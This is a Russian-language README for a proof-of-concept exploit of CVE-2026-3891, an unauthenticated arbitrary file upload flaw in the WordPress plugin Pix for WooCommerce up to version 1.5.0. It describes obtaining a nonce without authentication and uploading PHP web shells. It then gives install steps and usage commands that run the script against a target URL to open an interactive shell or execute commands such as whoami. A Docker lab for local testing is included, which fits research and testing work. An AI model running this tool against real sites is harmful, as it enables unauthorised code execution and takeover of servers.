
Pix for WooCommerce <= 1.5.0 - Неаутентифицированная произвольная загрузка файлов (CVE-2026-3891) PoC
CVE-2026-3891 — это неаутентифицированная уязвимость произвольной загрузки файлов в плагине WordPress Pix for WooCommerce. Плагин предоставляет AJAX-точку (lkn_pix_for_woocommerce_c6_save_settings), которая принимает загрузку файлов сертификатов без какой-либо аутентификации. Nonce может быть получен без аутентификации через вторую открытую точку (lkn_pix_for_woocommerce_generate_nonce), что позволяет полностью неаутентифицированному атакующему загружать произвольные файлы, включая PHP-веб-шеллы, напрямую в корневой каталог веб-сервера.
Затронутые версии: payment-gateway-pix-for-woocommerce <= 1.5.0
--commandgit clone https://github.com/joshuavanderpoll/CVE-2026-3891.git
cd CVE-2026-3891
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
git clone https://github.com/joshuavanderpoll/CVE-2026-3891.git
cd CVE-2026-3891
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python3 CVE-2026-3891.py --url <TARGET_URL> [--command <CMD>] [--timeout <SECONDS>] [--useragent <UA>]
Эксплуатируйте цель и войдите в постоянную интерактивную сессию оболочки для выполнения нескольких команд.
python3 CVE-2026-3891.py --url 'https://target.com'

Выполните одну команду на цели и выведите результат, полезно для скриптов или быстрых проверок.
python3 CVE-2026-3891.py --url 'https://target.com' --command whoami
Single command
Автономная среда Docker Compose с уязвимым программным обеспечением для локального тестирования. Подробнее см. DOCKER.md
cd docker/
docker compose up -d
python3 CVE-2026-3891.py --url 'http://localhost:8080'
Этот инструмент предоставляется только для образовательных и исследовательских целей. Создатель не несет ответственности за любое неправомерное использование или ущерб, причиненный этим инструментом.